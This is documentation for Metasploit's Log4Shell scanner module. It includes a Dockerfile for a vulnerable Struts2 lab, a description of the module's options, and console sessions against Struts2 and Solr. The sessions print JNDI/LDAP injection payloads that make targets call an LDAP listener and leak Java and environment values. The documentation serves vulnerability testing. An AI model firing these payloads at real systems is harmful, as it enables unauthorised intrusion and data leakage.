adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
T
Spencer McIntyre 70b1da6df4 Fix a misspelling
2022-04-06 09:04:26 -04:00

114 lines
4.2 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
HTTP headers and the HTTP request path. URI paths for common, known-vulnerable applications are included
in the `data/exploits/CVE-2021-44228/http_uris.txt` data file.
This module has been successfully tested with:
* Apache Solr
* Apache Struts2
* Spring Boot
* VMWare VCenter
## Verification Steps
1. Setup a vulnerable Struts2 instance (see the steps below)
2. Start msfconsole
3. Do: `use auxiliary/scanner/http/log4shell_scanner`
4. Set the `SRVHOST`, `RHOSTS`, `RPORT` and `TARGETURI` options
* For Struts2, set `TARGETURI` to `/struts2-showcase/`
5. Do: `run`
6. The target should be identified as vulnerable
### Apache Struts2 Setup
The following docker file can be used to setup a vulnerable Struts2 instance for testing.
```
#
# To build the image:
# docker build . -t struts2:2.5.28
# To run the container:
# docker run --name struts2 --rm -p 8080:8080 struts2:2.5.28
#
ARG version=2.5.28
FROM bitnami/tomcat:9.0
USER root
ENV TOMCAT_PASSWORD password
RUN apt-get update && \
apt-get -y install unzip && \
apt-get clean && \
rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
RUN curl https://archive.apache.org/dist/struts/2.5.28/struts-2.5.28-all.zip > struts-all.zip && \
unzip struts-all.zip && \
cp /struts-2.5.28/apps/struts2-showcase.war /bitnami/tomcat/webapps/
```
## Options
### HTTP_METHOD
The HTTP method to use.
### HEADERS_FILE
File containing headers to check, one per line. Lines starting with `#` will be treated as comments.
### URIS_FILE
File containing additional URIs to check, one per line. These values will be appended to the `TARGETURI` option. Lines
starting with `#` will be treated as comments. Lines may also contain the string `${jndi:uri}` which will be used as the
injection point. This enables query parameters to be included in the request which are required for certain
applications.
### LEAK_PARAMS
Additional parameters to leak, separated by the `^` character. For example the following would leak the USER and PATH
environment variables: `${env:USER}^${env:PATH}`. See the [Log4j Lookups][log4j-lookups] wiki page for more information
on available parameters.
### LDAP_TIMEOUT
Time in seconds to wait to receive LDAP connections.
## Scenarios
### Apache Struts2
```
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/
TARGETURI => /struts2-showcase/
msf6 auxiliary(scanner/http/log4shell_scanner) > run
[*] Started service listener on 192.168.159.128:389
[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/log4shell_scanner) >
```
### Apache Solr
Apache Solr is trivially exploitable by a remote and unauthenticated attacker when in its default configuration:
```
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245
[*] Started service listener on 10.9.4.245:389
[+] 10.10.235.209:8983 - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/vslscuy7m6q9pgfc18h/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Auxiliary module execution completed
```
[log4j-lookups]: https://logging.apache.org/log4j/2.x/manual/lookups.html
Reference in New Issue View Git Blame Copy Permalink